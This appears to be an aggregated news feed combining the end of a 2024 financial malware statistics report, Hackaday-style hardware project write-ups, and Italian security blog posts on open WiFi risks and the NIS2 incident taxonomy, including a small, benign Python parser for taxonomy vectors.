| CliptoShuffler | 9.5 |
| BitStealer | 1.3 |
* Unique users who encountered this malware family as a percentage of all users attacked by financial malware
Geography of PC banking malware attacks
To highlight the countries where financial malware was most prevalent in 2024, we calculated the share of users who encountered banking Trojans in the total number attacked by any type of malware in the country. The following statistics indicate where users are most likely to encounter financial malware.
As in 2023, the highest share of banking Trojans was registered in Afghanistan, where it rose from 6% to 9% in 2024. Turkmenistan was next (as in 2023), where the figure rose from 5.2% to 8.8%, and Tajikistan was in third place (again), where the figure rose from 3.7% to 6.2%.
TOP 20 countries by share of attacked users
| Country* | %** |
|---|---|
| Afghanistan | 9.2 |
| Turkmenistan | 8.8 |
| Tajikistan | 6.2 |
| Syria | 2.9 |
| Yemen | 2.6 |
| Kazakhstan | 2.5 |
| Switzerland | 2.3 |
| Kyrgyzstan | 2.2 |
| Uzbekistan | 2.1 |
| Mexico | 1.6 |
| Angola | 1.5 |
| Mauritania | 1.5 |
| Nicaragua | 1.5 |
| Guatemala | 1.3 |
| Argentina | 1.1 |
| Paraguay | 1.1 |
| Burundi | 1.1 |
| Bolivia | 1 |
| Uruguay | 1 |
| Belarus | 0.9 |
* Excluded are countries and territories with relatively few (under 10,000) Kaspersky users.
** Unique users whose computers were targeted by financial malware as a percentage of all Kaspersky users who encountered malware in the country.
Types of attacked users
Attacks on consumers accounted for 73.69% of all financial malware attacks in 2024, up from 61.2% in 2023.
Financial malware attack distribution by type (corporate vs consumer), 2022–2023
Mobile banking malware
The statistics for 2023 provided in this section were retrospectively revised and may not coincide with the data from the previous year’s report.
In 2024, the number of users who encountered mobile banking Trojans grew 3.6 times compared to 2023: from 69,200 to 247,949. As can be seen in the graph below, the malicious activity increased dramatically in the second half of the year.
Number of Android users attacked by banking malware by month, 2022–2023
The most active Trojan-Banker family in 2024 was Mamont (36.70%). This malware first appeared at the end of 2023 and is distributed mostly in Russia and the CIS. Its distribution schemes range from age-old “Is that you in the picture?” scams to complex social engineering plots with fake stores and delivery tracking apps.
| Verdict | %* 2023 | %* 2024 | Difference in p.p. | Change in ranking |
|---|---|---|---|---|
| Trojan-Banker.AndroidOS.Mamont.bc | 0.00 | 36.70 | +36.70 | |
| Trojan-Banker.AndroidOS.Agent.rj | 0.00 | 11.14 | +11.14 | |
| Trojan-Banker.AndroidOS.Mamont.da | 0.00 | 4.36 | +4.36 | |
| Trojan-Banker.AndroidOS.Coper.a | 0.51 | 3.58 | +3.07 | +30 |
| Trojan-Banker.AndroidOS.UdangaSteal.b | 0.00 | 3.17 | +3.17 | |
| Trojan-Banker.AndroidOS.Agent.eq | 21.79 | 3.10 | -18.69 | -4 |
| Trojan-Banker.AndroidOS.Mamont.cb | 0.00 | 3.05 | +3.05 | |
| Trojan-Banker.AndroidOS.Bian.h | 23.13 | 3.02 | -20.11 | -7 |
| Trojan-Banker.AndroidOS.Faketoken.z | 0.68 | 2.96 | +2.29 | +18 |
| Trojan-Banker.AndroidOS.Coper.c | 0.00 | 2.84 | +2.84 | |
* Share of unique users who encountered this malware as a percentage of all users of Kaspersky mobile security solutions who encountered banking threats
The Bian.h variant (3.02%) that prevailed in 2023 dropped to eighth place, losing over 20 p.p., and several more new samples entered the ranking: Agent.rj (11.14%) in second place, UdangaSteal.b (3.17%) and Coper.c (2.84%).
Geography of the attacked mobile users
As in 2023, Turkey was the number one country targeted by mobile banking malware. The share of users encountering financial threats there grew by 2.7 p.p., reaching 5.68%. Malicious activity also increased in Indonesia (2.71%), India (2.42%), Azerbaijan (0.88%), Uzbekistan (0.63%) and Malaysia (0.29%). In Spain (0.73%), Saudi Arabia (0.63%), South Korea (0.30%) and Italy (0.24%), it decreased.
| Country* | %** |
|---|---|
| Turkey | 5.68 |
| Indonesia | 2.71 |
| India | 2.42 |
| Azerbaijan | 0.88 |
| Spain | 0.73 |
| Saudi Arabia | 0.63 |
| Uzbekistan | 0.63 |
| South Korea | 0.30 |
| Malaysia | 0.29 |
| Italy | 0.24 |
* Countries and territories with relatively few (under 25,000) Kaspersky mobile security users have been excluded from the rankings.
** Unique users attacked by mobile banking Trojans as a percentage of all Kaspersky mobile security users in the country.
Conclusion
In 2024, financial cyberthreats continued to evolve, with cybercriminals deploying phishing, malware and social engineering techniques to exploit individuals and businesses alike. The rise in cryptocurrency-related scams and mobile financial malware highlights the need for continuous vigilance and proactive cybersecurity measures, including multi-factor authentication, user awareness training and advanced threat detection solutions. As the digital finance landscape expands, staying ahead of emerging threats remains critical.
To protect your devices and finance-related accounts:
- Use multifactor authentication, strong unique passwords and other secure authentication tools.
- Do not follow links in suspicious messages, and double-check web pages before entering your secrets, be it credentials or banking card details.
- Download apps only from trusted sources, such as official app marketplaces.
- Use reliable security solutions capable of detecting and stopping both malware and phishing attacks.
To protect your business:
- Update your software in a timely manner. Pay particular attention to security patches.
- Improve your employees’ security awareness on a regular basis, and encourage safe practices, such as proper account protection.
- Implement robust monitoring and endpoint security.
- Implement strict security policies for users with access to financial assets, such as default deny policies and network segmentation.
- Use threat intelligence services from trusted sources to stay aware of the latest threats and cybercrime trends.
Metal Detector Built With Smartphone Interface
If you think of a metal detector, you’re probably thinking of a fairly simple device with a big coil and a piercing whine coming from a tinny speaker. [mircemk] has built a more modern adaptation. It’s a metal detector you can use with your smartphone instead.
The metal detector part of the project is fairly straightforward as far as these things go. It uses the pulse induction technique, where short pulses are fired through a coil to generate a magnetic field. Once the pulse ends, the coil is used to detect the decaying field as it spreads out. The field normally fades away in a set period of time. However, if there is metal in the vicinity, the time to decay changes, and by measuring this, it’s possible to detect the presence of metal.
In this build, an ESP32 is in charge of the show, generating the necessary pulses and detecting the resulting field. It’s paired with the usual support circuitry—an op-amp and a few transistors to drive the coil appropriately, and the usual smattering of passives. The ESP32 then picks up the signal from the coil and processes it, passing the results to a smartphone via Bluetooth.
The build is actually based on a design by [Neco Desarrollo], who presents more background and other variants for the curious. We’ve featured plenty of [mircemk]’s projects before, like this neat proximity sensor build.
youtube.com/embed/bAqhLof0Hhs?…
Open WiFi Networks: Fertile Ground for Cybercrime
Today the proliferation of portable, wearable and otherwise smart devices has made exchanging data, accessing resources and browsing the web indispensable.
This installment of the Wi-Fi column focuses on a widely deployed category of networks. Hotels, airports, conference halls, public and private companies, hospitals and so on let people stay connected inside their premises through so-called open networks (often called guest networks).
Open WiFi networks, while useful for the convenience and accessibility they offer, are one of the most significant threats in the information security landscape. Their lack of protection makes them fertile ground for illicit activity and for cybercriminals, who exploit these networks to intercept sensitive data and orchestrate complex attacks. This article will be split into several parts.
This will let us explore in depth how unprotected WiFi networks facilitate cybercrime. We will analyze some of the most common techniques used by hackers and also discuss the countermeasures to use to protect yourself.
Let’s start with some statistics and with why we think this topic should not be underestimated.
Distribution of open WiFi networks:
Public WiFi networks have become a necessity, as reported in the Broadband Search article
(Vital Statistics on Public WiFi: Usage, Safety & Trends – BroadbandSearch – updated 18 April 2024):
In today’s hyperconnected world, public WiFi has emerged as more than just a convenience: it has become a real necessity.
Among other things, the article reports that
Italy offers 72,680 free WiFi hotspots. A significant number of these are sponsored by local municipalities in various cities across the country. In addition, most leisure venues and accommodation facilities offer free Internet access to customers. The leading cities for WiFi connectivity are Rome with 4,842 hotspots, Milan with 4,626 and Naples close behind with 4,475.
At the same time, Forbes reports a survey of 2,000 Americans
forbes.com/advisor/business/pu…
The survey shows that public Wi-Fi use remains high. 56% of respondents connect to public Wi-Fi networks without a password, despite the risks.
That said, the largest share of respondents (32%) say they use it:
As a last resort when there is no cellular connection
The survey also confirms how dangerous open WiFi networks are. 43% of respondents confirm that their online security was compromised while using these networks. Below is the ranking of the most common places where respondents experienced such compromises:
forbes.com/advisor/business/pu…
This Forbes survey makes clear that:
- The largest share (35%) of people access public Wi-Fi three or four times a month.
- 23% of people use public Wi-Fi to reduce their cellular data usage.
- 20% use public Wi-Fi to carry out financial transactions.
- The places where people most commonly use public Wi-Fi are restaurants and hotels.
- Four in ten people have had their data compromised while using a public Wi-Fi network.
- Most people had their personal data compromised over public Wi-Fi networks in cafés, airports or hotels.
Although this research is based on an American audience, we at RedWave Team think it closely mirrors what happens in our country too.
The main risks of 2025
Several analyses rank cybersecurity first among the main risks of 2025.
One is this analysis by ECIIA (an international non-profit organization based in Brussels), which analyzes data collected from 985 CAEs (comitati aziendali europei, European works councils: committees set up in every Community-scale undertaking or group of undertakings, made up of employees of that undertaking, whose purpose is to “inform and consult workers” on the company’s economic performance and on the main transnational decisions affecting employment relationships) from 20 European countries:
eciia.eu/wp-content/uploads/20…
As the report shows:
- Cybersecurity remains in first place, with 83% of CAEs citing it as one of the main risks.
- Artificial intelligence and the digital revolution are the fastest-growing risks and are expected to reach second place by 2028.
Conclusion
Our digital security is a priority and requires attention: we must absolutely avoid using open WiFi networks.
These networks require no authentication to connect, which means anyone within range can access the network. This characteristic, although convenient for the user experience, introduces several critical issues:
- No encryption: data sent over an open network travels in cleartext and can easily be intercepted by anyone.
- Anonymous access: connected users are not authenticated, which makes it hard to identify or block malicious actors.
- Fake access points: attackers can create “clones” of open WiFi networks to deceive users and intercept traffic, turning them into a channel for collecting personal and other data.
Avoiding open WiFi networks is a fundamental measure for protecting our digital security and reducing the risk of exposure to these threats.
The article Open WiFi Networks: Fertile Ground for Cybercrime comes from il blog della sicurezza informatica.
NIS2: The New “Made in Italy” Classification for Incidents
Author: Dott. Luca Mella, Cyber Security Expert
In Italy, Legislative Decree no. 138 of 4 September 2024 transposed these changes, requiring public administrations and private companies to make a considerable effort to comply with the new obligations. Among the main requirements for 2025, besides registration, in-scope organizations must prepare to comply with the new rules for notifying cyber incidents.
In this context, the Agenzia per la Cybersicurezza Nazionale (ACN) introduced the Tassonomia Cyber dell’ACN (TC-ACN), a fundamental tool for standardizing incident communication and improving information exchange.
The “Tassonomia Cyber dell’ACN”
Precisely to ease compliance with the NIS2 requirements, ACN has released a new guideline called “Tassonomia Cyber dell’ACN” (TC-ACN). The goal is as simple as it is ambitious: to harmonize the vocabulary and make reporting and information exchange on cybersecurity more effective, so as to overcome the long-standing ambiguities that all of us in the field are used to fighting because of the many disparate and heterogeneous classification systems.
Born from an analysis of the main international taxonomies (in particular those of ENISA, MITRE and MISP) and calibrated to the Italian regulatory context, TC-ACN is a tool for characterizing events and incidents that stands out for:
- Exhaustiveness: it includes an extremely broad catalogue of attributes (144 in total) and 22 predicates grouped into 4 macro-categories.
- Expressiveness: TC-ACN makes it possible to describe in a granular way the nature of the event, the responsible actor, the techniques used for the compromise and much other information useful in the incident response phase.
- Alignment with national regulations (PSNC, Codice delle Comunicazioni Elettroniche, etc.) and with the additional responsibilities introduced by NIS2.
To start appreciating the power of this new framework, let’s explore the 4 macro-categories of TC-ACN, that is, its highest-level structural elements:
- BC (Baseline Characterization): the introductory level of the analysis, which assesses the extent of the damage, the nature of the attack and the organizational components involved.
- TT (Threat Type): goes deeper into the technical elements of the incident (for example infection vectors, exploited vulnerabilities, types of malware).
- TA (Threat Actor): identifies the “hand” behind the event (criminal groups, individual hackers, nation-states, malicious insiders, etc.) and assesses its motivations and skills.
- AC (Additional Context): provides further contextual information, such as the classification of the affected systems, any correlations with past incidents, the defensive tools in place and possible escalation scenarios.
Figure. TC-ACN macro-categories
The TC-ACN approach departs substantially from that of earlier taxonomies, which are typically based on categorization into classes, and aims for a depth of analysis comparable to that used for classifying vulnerabilities (think of CVSS), which is vector-based.
This makes it possible to compose different informational “pieces” into a single “classification vector”, including:
- The estimated impact on systems and data (availability, integrity, confidentiality).
- The attack techniques adopted (malicious code, phishing, exploit kit, privilege escalation).
- The actor and its motivations (e.g. financial crime, industrial espionage, hacktivism).
- The temporal and geographical perspective of the incident.
For example, the TC-ACN vector “BC:IM-DE BC:RO-MA BC:SE-HI BC:VG-IT” describes an incident that led to a serious exposure of data on national territory (such as a data breach) caused by malicious actions. This is only a fairly simple example, limited to the predicates of the “Baseline Characterization” macro-category.
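To make the vector structure concrete, here is an added example (not code from the article, ACN or Utilia) that parses the vector quoted above, validates each token against the four macro-categories and reports which macro-categories are still uncharacterized. The `MACRO:PREDICATE-VALUE` token shape is generalized from that single example, and the glossary entries are assumed readings inferred from the article's description of it, not taken from the ACN guideline.

```python
import re
from collections import namedtuple

Token = namedtuple("Token", "macro predicate value")

# The four macro-categories named in the article.
MACROCATEGORIES = {
    "BC": "Baseline Characterization",
    "TT": "Threat Type",
    "TA": "Threat Actor",
    "AC": "Additional Context",
}

# ASSUMPTION: readings inferred from the article's one-sentence description of
# its example vector, not copied from the ACN guideline.
ASSUMED_GLOSSARY = {
    ("BC", "IM", "DE"): "impact: data exposure",
    ("BC", "RO", "MA"): "root cause: malicious action",
    ("BC", "SE", "HI"): "severity: high",
    ("BC", "VG", "IT"): "geography: national territory (Italy)",
}

# ASSUMPTION: token shape MACRO:PREDICATE-VALUE, generalized from that example.
TOKEN_RE = re.compile(r"([A-Z]{2}):([A-Z]{2})-([A-Z0-9]+)")


def parse_vector(text):
    """Split a vector into validated tokens; raise ValueError on bad input."""
    tokens = []
    for raw in text.strip(' \t\n"“”').split():
        match = TOKEN_RE.fullmatch(raw)
        if match is None:
            raise ValueError(f"malformed token: {raw!r}")
        token = Token(*match.groups())
        if token.macro not in MACROCATEGORIES:
            raise ValueError(f"unknown macro-category in {raw!r}")
        tokens.append(token)
    if not tokens:
        raise ValueError("empty vector")
    return tokens


def group(tokens):
    """Nest as {macro: {predicate: [values]}}; repeated predicates keep every value."""
    grouped = {}
    for t in tokens:
        grouped.setdefault(t.macro, {}).setdefault(t.predicate, []).append(t.value)
    return grouped


def missing_macrocategories(tokens):
    """Macro-categories the vector does not characterize yet, in article order."""
    present = {t.macro for t in tokens}
    return [m for m in MACROCATEGORIES if m not in present]


def describe(tokens):
    """One readable line per token, using the assumed glossary where it applies."""
    lines = []
    for t in tokens:
        gloss = ASSUMED_GLOSSARY.get(tuple(t), "no gloss in this example")
        lines.append(f"{t.macro}:{t.predicate}-{t.value}  {MACROCATEGORIES[t.macro]} / {gloss}")
    return lines


if __name__ == "__main__":
    # The vector quoted in the article, curly quotes included.
    vector = parse_vector("“BC:IM-DE BC:RO-MA BC:SE-HI BC:VG-IT”")
    print("\n".join(describe(vector)))
    print("grouped:", group(vector))
    print("not characterized:", missing_macrocategories(vector))
```

Run against the article's vector, the missing-category check returns TT, TA and AC, which matches the article's remark that the example covers only Baseline Characterization.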
How to use TC-ACN in practice?
The Agency has published the official guideline on the acn.gov.it site, and its adoption becomes crucial on several fronts:
- first of all, to reduce reaction times: thanks to a shared language, security teams can immediately understand the nature and severity of the event, speeding up countermeasures;
- to improve communication with the Authority: with a common standard when notifying an incident to ACN or CSIRT Italia, the details provided are complete and correctly framed;
- and finally to increase compliance with NIS2 and with the national regulations that require timely incident notification.
It must be said, however, that the complexity of the taxonomy, especially compared with simpler classification methods (such as ENISA’s), can create initial operational difficulties. In this regard, the Cyber unit of Utilia SpA (a company of Gruppo Società Gas Rimini) has developed and shared free of charge an online tool that provides:
- Guided generation of the so-called “incident vectors” according to the ACN taxonomy, filling in the required attributes step by step.
- Export of the information in a format suitable for notification to ACN and the CSIRT, or for internal sharing among security departments.
- Constant updating of the tool, integrating any revisions of the taxonomy or new specifications from ACN.
In this way, companies preparing to meet the upcoming deadlines (from registration to mandatory notification) have support that can limit the risk of non-compliance and ease incident management.
Figure. TC-ACN vector generation tool (tassonomia-acn.utilia.it/ )
Conclusions
With the NIS2 Directive fully in force, the national cybersecurity landscape is about to shift gears. The Tassonomia Cyber dell’ACN acts as the fulcrum for standardizing incident reports, ensuring:
- Greater clarity in communication between bodies, companies and authorities.
- Shorter intervention times and a more timely response to attacks.
- Structure and uniformity in reporting data, which is also useful for system-wide trend analysis.
Preparing early, by studying the taxonomy’s predicates and values and using the available tools, can make the difference in avoiding sanctions and in concretely raising the security threshold for those involved.
TC-ACN is therefore not only a regulatory requirement but a strategic resource for ensuring the resilience of Italy’s digital fabric, consolidating a genuine common language that can raise the standards of information security and of protection for services essential to the community.
The article NIS2: The New “Made in Italy” Classification for Incidents comes from il blog della sicurezza informatica.
Handheld Console Plays Original Pong With Modern E-Waste
[Simon] wrote in to let us know about DingPong, his handheld portable Pong console. There’s a bit more to it than meets the eye, however. Consider for a moment that back in the 1970s playing Pong required a considerable amount of equipment, not least of which was dedicated electronics and a CRT monitor. What was huge (in more than one way) in the 70s has been shrunk down to handheld, and implemented almost entirely on modern e-waste in the process.
The 1970s would be blown away by a handheld version of Pong, made almost entirely from salvaged components.
DingPong is housed in an old video doorbell unit (hence the name) and the screen is a Sony Video Watchman, a portable TV from 1982 with an amazing 4-inch CRT whose guts [Simon] embeds into the enclosure. Nearly everything in the build is either salvaged, or scrounged from the junk bin. Components are in close-enough values, and power comes from nameless lithium-ion batteries that are past their prime but still good enough to provide about an hour of runtime. The paddle controllers? Two pots (again, of not-quite-the-right values) sticking out the sides of the unit, one for each player.
At the heart of DingPong one will not find any flavor of Arduino, Raspberry Pi, or ESP32. Rather, it’s built around an AY-3-8500 “Ball & paddle” (aka ‘Pong’) integrated circuit from 1977, which means DingPong plays the real thing!
We have seen Pong played on a Sony Watchman before, and we’ve also seen a vintage Pong console brought back to life, but we’re pretty sure this is the first time we’ve seen a Sony Watchman running Pong off a chip straight from the 70s. Watch it in action in the video (in German), embedded below.
youtube.com/embed/BKmamKUb-zc?…
Glow In The Dark PCBs Are Pretty Cool
What if circuit boards could glow in the dark? It’s a fun question, and one [Botmatrix] sought to answer when approached by manufacturer PCBWay to run a project together. It turns out that it’s quite possible to make glowing PCBs, with attractive results. (Video after the break.)
Specifically, PCBWay has developed a workable glow-in-the-dark silkscreen material that can be applied to printed circuit boards. As a commercial board house, PCBWay hasn’t rushed to explain how precisely they pulled off this feat. We don’t imagine that it involved anything more than adding some glow-in-the-dark powder to their usual silkscreen ink, but we can only speculate.
On [Botmatrix]’s end, his video steps through some neat testing of the performance of the boards. They’re tested using sensors to determine how well they glow over time.
It might seem like a visual gimmick, and to an extent, it’s just a bit of fun. But still, [Botmatrix] notes that it could have some practical applications too. For example, glow-in-the-dark silkscreen could be used to highlight specific test points on a board or similar, which could be instantly revealed with the use of a UV flashlight. It’s an edge case, but a compelling one. It’s also likely to be very fun for creating visually reactive conference badges or in other applications where the PCB plays a major cosmetic role.
[Botmatrix] says these are potentially the first commercially-available glow-in-the-dark printed PCBs. We love glow in the dark stuff; we’ve even explored how to make your own glowing material before, too.
youtube.com/embed/bdmOeqohdNs?…
PPS Is The Hottest USB-C Feature You Didn’t Know About
USB Power Delivery is widely considered to be a good thing. It’s become relatively standard, and is a popular way for makers to easily power their projects at a number of specific, useful voltages. However, what you may not know is that it’s possible to get much more variable voltages out of some USB chargers out there. As [GreatScott!] explains, you’ll want to meet USB-C PPS.
PPS stands for Programmable Power Supply. It’s a method by which a USB-C device can request variable voltage and current delivery on demand. Unlike the Power Delivery standard, you’re not limited to set voltages at tiers of 5V, 9V, 15V and 20V. You can have your device request the exact voltage it wants, right from the charger. Commercially, it’s most typically used to allow smartphones to charge as fast as possible by getting the optimum voltage to plumb into the battery. However, with the right techniques, you can use PPS to get a charger to output whatever voltage you want, from 3.3 V to 21 V, for your own nefarious purposes. You can choose a voltage in 20 mV increments, and even set a current limit in 50 mA increments. Don’t go mad with power, now.
However, there’s a hitch. Unlike USB PD, there isn’t yet a whole ecosystem of $2 PPS breakout boards ready to gloop into your own little projects. As [GreatScott!] suggests, if you want to use PPS, you might want to take a look at the AP33772S IC. It’s a USB PD3.1 Sink Controller. You can command it over I2C to ask for the voltage and current you want. If that’s too hard, though, [CentyLab] has a solution on Tindie to get you going faster. It’s also got some exciting additional functionality—like USB-C AVS support. It offers higher voltage and more power, albeit with less resolution, but chargers with this functionality are quite obscure at this stage.
We’ve actually touched on PPS capability before in our exploration of the magic that is USB-C Power Delivery. Video after the break.
youtube.com/embed/kcmpGbR6xZc?…
[Thanks to Keith Olson for the tip!]
Mural: The Plotter That Draws On Walls
Let’s say you’ve got a big bare wall in your home, and you want some art on it. You could hang a poster or a framed artwork, or you could learn to paint a mural yourself. Or, like [Nik Ivanov], you could build a plotter called Mural, and get it to draw something on the wall for you.
The build is straightforward enough. It uses a moving carriage suspended from toothed belts attached to two points up high on the wall. Stepper motors built into the carriage reel the belts in and out to move it up and down the wall, and from side to side. In this case, [Nik] selected a pair of NEMA 17 steppers to do the job. They’re commanded by a NodeMCU ESP32, paired with TMC2209 stepper motor drivers. The carriage also includes a pen lifter, which relies on a MG90s servo to lift the drawing implement away from the wall.
The build is quite capable, able to recreate SVG vector graphics quite accurately, without obvious skew or distortion. [Nik] has been using the plotter with washable Crayola markers, so he can print on the wall time and again without leaving permanent marks. It’s a great way to decorate—over and over again—on a budget. Total estimated cost is under $100, according to [Nik].
We’ve featured some neat projects along these lines before, too. Video after the break.
youtube.com/embed/MOENFOZCs54?…
Wearable Computing Goes Woven, Wireless, and Washable
Sometimes we come across a wild idea that really tries to re-imagine things, and re-conceiving wearable computing as a distributed system of “fiber computers” embedded into textiles is definitely that. The research paper presents fully-functional fiber computers and sensors that are washable, weave-able, wireless, and resist both stretching and bending.
The research paper with all the details is behind a paywall at this time, but we’ll summarize the important parts that are likely to get a hacker’s mind working.
Each fiber strand (like the one shown here) is a self-contained system. Multiple fibers can communicate with one another wirelessly to create a network that, when integrated into garments, performs tasks like health and activity monitoring while using very little power. And what’s really interesting about these fibers is their profound lack of anything truly exotic when it comes to their worky bits.
The inner components of a fiber computer are pretty recognizable: each contains a surface-mount microcontroller, LEDs, BLE (Bluetooth Low Energy) radio, light sensor, temperature sensor, accelerometer, and photoplethysmography (PPG) sensor for measuring blood volume changes through skin. Power is supplied by a separate segment containing a tiny cylindrical lithium-polymer battery, with a simple plug connector. It’s a tiny battery, but the system is so low-power that it still provides hours of operation.
If there’s a secret sauce, it’s in the fabrication. The first step is stretching a system into a long, thin circuit. Each component is nested onto a small piece of flex PCB that acts a little like a breakout board, and that flex PCB gets rolled around each component to make as tiny a package as possible. These little payloads are connected to one another by thin wires, evenly spaced to form a long circuit. That circuit gets (carefully!) sealed into a thermoformed soft polymer and given an overbraid, creating a fiber that has a few lumps here and there but is nevertheless remarkably thin and durable. The result can be woven into fabrics, worn, washed, bent, and in general treated like a piece of clothing.
Closeups of components that make up a single strand of “fiber computer”.
Multiple fibers are well-suited to being woven into clothing in a distributed way, such as one for each limb. Each fiber is self-contained but communicates with its neighbors using a BLE mesh, or transmitting data optically via embedded LEDs and light sensors. Right now, such a distributed system has been shown to be able to perform health monitoring and accurately classify different physical activities.
We’ve seen sensors directly on skin and transmitting power over skin, but this is a clever fusion of conventional parts and unconventional design — wearable computing that’s not just actually wearable and unobtrusive, but durable and even washable.